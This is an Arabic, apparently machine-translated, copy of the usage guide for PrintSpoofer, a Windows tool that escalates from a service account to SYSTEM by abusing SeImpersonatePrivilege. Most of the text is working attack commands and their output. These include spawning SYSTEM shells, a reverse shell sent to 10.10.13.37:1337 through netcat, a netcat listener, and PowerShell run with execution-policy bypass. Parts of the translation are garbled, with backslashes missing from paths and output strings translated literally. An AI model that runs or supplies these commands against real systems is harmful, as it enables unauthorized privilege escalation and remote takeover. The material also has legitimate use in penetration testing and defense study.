من الخدمة المحلية/الشبكة إلى النظام عن طريق إساءة استخدام SeImpersonatePrivilege
على Windows 10 وServer 2016/2019.
يمكنك التحقق من رسالة المساعدة باستخدام الخيار -h
.
C:الأدوات>PrintSpoofer.exe -h PrintSpoofer v0.1 (بواسطة @itm4n) بشرط أن يكون لدى المستخدم الحالي امتياز SeImpersonate، ستستفيد هذه الأداة من ميزة الطباعة خدمة التخزين المؤقت للحصول على رمز مميز للنظام ثم تشغيل أمر مخصص باستخدام CreateProcessAsUser() الحجج: -cنفذ الأمر *CMD* -i التفاعل مع العملية الجديدة في موجه الأوامر الحالي (الافتراضي غير تفاعلي) -d تفرخ عملية جديدة على سطح المكتب تتوافق مع هذه الجلسة *ID* (تحقق من معرفك باستخدام qwinsta) -ح هذا أنا :) أمثلة: - قم بتشغيل PowerShell كـ SYSTEM في وحدة التحكم الحالية PrintSpoofer.exe -i -c powershell.exe - ظهور موجه أوامر النظام على سطح مكتب الجلسة 1 PrintSpoofer.exe -d 1 -c cmd.exe - احصل على غلاف عكسي للنظام PrintSpoofer.exe -c "c:Tempnc.exe 10.10.13.37 1337 -e cmd"
إذا كان لديك Shell تفاعلي ، فيمكنك إنشاء عملية SYSTEM جديدة في وحدة التحكم الحالية لديك.
حالة الاستخدام : ربط Shell، وReverse Shell، psexec.py
، وما إلى ذلك.
C:TOOLS>PrintSpoofer.exe -i -c cmd [+] تم العثور على الامتياز: SeImpersonatePrivilege [+] الاستماع إلى الأنابيب المسماة... [+] CreateProcessAsUser() موافق مايكروسوفت ويندوز [الإصدار 10.0.19613.1000] (ج) 2020 شركة مايكروسوفت. جميع الحقوق محفوظة. C:WINDOWSsystem32>whoami نظام السلطة NT
إذا كان بإمكانك تنفيذ الأوامر ولكن ليس لديك غلاف تفاعلي، فيمكنك إنشاء عملية نظام جديدة والخروج فورًا دون التفاعل معها.
حالة الاستخدام : WinRM وWebShell و wmiexec.py
و smbexec.py
وما إلى ذلك.
إنشاء قذيفة عكسية:
C:TOOLS>PrintSpoofer.exe -c "C:TOOLSnc.exe 10.10.13.37 1337 -e cmd" [+] تم العثور على الامتياز: SeImpersonatePrivilege [+] الاستماع إلى الأنابيب المسماة... [+] CreateProcessAsUser() موافق
مستمع Netcat:
ج:الأدوات>nc.exe -l -p 1337 مايكروسوفت ويندوز [الإصدار 10.0.19613.1000] (ج) 2020 شركة مايكروسوفت. جميع الحقوق محفوظة. C:WINDOWSsystem32>whoami نظام السلطة NT
إذا قمت بتسجيل الدخول محليًا أو عبر RDP (بما في ذلك VDI)، فيمكنك إنشاء موجه أوامر النظام على سطح المكتب لديك. أولاً، تحقق من معرف الجلسة الخاصة بك باستخدام الأمر qwinsta
ثم حدد هذه القيمة باستخدام الخيار -d
.
حالة الاستخدام : الجلسة الطرفية (RDP)، VDI
ج: الأدوات> qwinsta معرف اسم المستخدم للجلسة، نوع الجهاز الخدمات 0 القرص مسؤول وحدة التحكم 1 نشط >rdp-tcp#3 مستخدم المختبر 3 نشط ردب-تكب 65536 الاستماع C:TOOLS>PrintSpoofer.exe -d 3 -c "powershell -ep bypass" [+] تم العثور على الامتياز: SeImpersonatePrivilege [+] الاستماع إلى الأنابيب المسماة... [+] CreateProcessAsUser() موافق